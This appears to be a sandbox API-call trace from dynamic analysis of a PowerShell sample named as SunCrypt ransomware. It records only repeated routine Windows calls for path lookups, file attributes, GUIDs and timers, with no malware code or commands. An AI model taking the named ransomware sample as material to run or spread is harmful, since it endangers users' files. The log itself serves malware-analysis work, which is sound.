SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.619] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.619] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.619] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.620] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701043679758) returned 1 [0097.620] EtwEventActivityIdControl () returned 0x0 [0097.621] EtwEventActivityIdControl () returned 0x0 [0097.621] EtwEventActivityIdControl () returned 0x0 [0097.621] EtwEventActivityIdControl () returned 0x0 [0097.621] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xe2a48b1, Data2=0xe199, Data3=0x4aad, Data4=([0]=0x92, [1]=0xe2, [2]=0x17, [3]=0xe0, [4]=0x69, [5]=0xdf, [6]=0x8, [7]=0x36))) returned 0x0 [0097.621] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.621] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.621] CoTaskMemFree (pv=0x4272d90) [0097.622] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701043815444) returned 1 [0097.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.622] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.622] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.632] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701044857722) returned 1 [0097.632] EtwEventActivityIdControl () returned 0x0 [0097.632] EtwEventActivityIdControl () returned 0x0 [0097.632] EtwEventActivityIdControl () returned 0x0 [0097.709] EtwEventActivityIdControl () returned 0x0 [0097.709] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1acbafa3, Data2=0xa81b, Data3=0x4633, Data4=([0]=0xae, [1]=0xb1, [2]=0xb4, [3]=0x7f, [4]=0x1a, [5]=0xd7, [6]=0x1b, [7]=0xc3))) returned 0x0 [0097.710] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.710] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.710] CoTaskMemFree (pv=0x4272d90) [0097.710] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701052656632) returned 1 [0097.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.710] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.711] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.718] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701053436006) returned 1 [0097.718] EtwEventActivityIdControl () returned 0x0 [0097.718] EtwEventActivityIdControl () returned 0x0 [0097.718] EtwEventActivityIdControl () returned 0x0 [0097.718] EtwEventActivityIdControl () returned 0x0 [0097.718] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7a0842dd, Data2=0xfe9d, Data3=0x45c1, Data4=([0]=0x97, [1]=0xbd, [2]=0xd2, [3]=0xa4, [4]=0x2f, [5]=0x6, [6]=0xda, [7]=0xbc))) returned 0x0 [0097.719] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.719] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.719] CoTaskMemFree (pv=0x4272d90) [0097.719] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701053572555) returned 1 [0097.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.719] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.721] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701053764552) returned 1 [0097.721] EtwEventActivityIdControl () returned 0x0 [0097.721] EtwEventActivityIdControl () returned 0x0 [0097.721] EtwEventActivityIdControl () returned 0x0 [0097.721] EtwEventActivityIdControl () returned 0x0 [0097.721] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2d326cdc, Data2=0x5bcb, Data3=0x4a19, Data4=([0]=0x88, [1]=0x3f, [2]=0x51, [3]=0x14, [4]=0x0, [5]=0xeb, [6]=0xec, [7]=0xf6))) returned 0x0 [0097.722] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.722] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.722] CoTaskMemFree (pv=0x4272d90) [0097.722] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701053897642) returned 1 [0097.722] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.723] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.723] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.723] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.723] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.723] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.724] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701054076653) returned 1 [0097.724] EtwEventActivityIdControl () returned 0x0 [0097.724] EtwEventActivityIdControl () returned 0x0 [0097.724] EtwEventActivityIdControl () returned 0x0 [0097.724] EtwEventActivityIdControl () returned 0x0 [0097.724] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x665adb6e, Data2=0x7bed, Data3=0x4ebe, Data4=([0]=0x88, [1]=0x7f, [2]=0x6c, [3]=0xcc, [4]=0x45, [5]=0xe0, [6]=0xbb, [7]=0xeb))) returned 0x0 [0097.725] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.725] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.725] CoTaskMemFree (pv=0x4272d90) [0097.725] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701054200164) returned 1 [0097.725] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.726] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.726] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.726] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.726] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.727] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701054365230) returned 1 [0097.727] EtwEventActivityIdControl () returned 0x0 [0097.727] EtwEventActivityIdControl () returned 0x0 [0097.727] EtwEventActivityIdControl () returned 0x0 [0097.727] EtwEventActivityIdControl () returned 0x0 [0097.727] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x56349a21, Data2=0x7cb9, Data3=0x444e, Data4=([0]=0xa9, [1]=0x65, [2]=0xe9, [3]=0xe2, [4]=0x54, [5]=0xba, [6]=0xb8, [7]=0x22))) returned 0x0 [0097.728] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.728] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.728] CoTaskMemFree (pv=0x4272d90) [0097.728] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701054484668) returned 1 [0097.728] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.728] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.729] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.729] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.729] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.734] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701055058100) returned 1 [0097.734] EtwEventActivityIdControl () returned 0x0 [0097.734] EtwEventActivityIdControl () returned 0x0 [0097.734] EtwEventActivityIdControl () returned 0x0 [0097.808] EtwEventActivityIdControl () returned 0x0 [0097.931] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0xe96419b0, Data2=0xa122, Data3=0x4483, Data4=([0]=0xbe, [1]=0x53, [2]=0x4f, [3]=0xd8, [4]=0x2c, [5]=0x8e, [6]=0x11, [7]=0x91))) returned 0x0 [0097.931] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.931] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.931] CoTaskMemFree (pv=0x4272d90) [0097.957] EtwEventActivityIdControl () returned 0x0 [0097.957] EtwEventActivityIdControl () returned 0x0 [0097.957] EtwEventActivityIdControl () returned 0x0 [0097.996] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec44 | out: lpPerformanceCount=0x4ebec44*=1701081294399) returned 1 [0097.996] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.996] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe930) returned 1 [0097.997] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebebf4 | out: lpFileInformation=0x4ebebf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe92c) returned 1 [0097.997] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.997] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0098.003] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebec0c | out: lpPerformanceCount=0x4ebec0c*=1701081942601) returned 1 [0098.066] EtwEventActivityIdControl () returned 0x0 [0098.088] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x2d2350 [0098.176] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x2d23d8 [0098.182] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x9ce3a19c, Data2=0x7098, Data3=0x45bd, Data4=([0]=0x8e, [1]=0xf8, [2]=0xd2, [3]=0x8e, [4]=0xd7, [5]=0xf8, [6]=0x7f, [7]=0x1a))) returned 0x0 [0098.183] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0098.183] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0098.183] CoTaskMemFree (pv=0x4272d90) [0098.183] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701099962409) returned 1 [0098.183] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0098.183] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0098.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0098.183] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0098.183] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0098.184] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0098.184] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0098.186] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701100243708) returned 1 [0098.186] EtwEventActivityIdControl () returned 0x0 [0098.186] EtwEventActivityIdControl () returned 0x0 [0098.186] EtwEventActivityIdControl () returned 0x0 [0098.499] EtwEventActivityIdControl () returned 0x0 [0098.499] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x43052924, Data2=0x87b4, Data3=0x49d8, Data4=([0]=0xbb, [1]=0x38, [2]=0xd8, [3]=0x83, [4]=0x84, [5]=0xbf, [6]=0x6e, [7]=0xfb))) returned 0x0 [0098.499] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0098.499] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0098.500] CoTaskMemFree (pv=0x4272d90) [0098.500] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701132114273) returned 1 [0098.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b 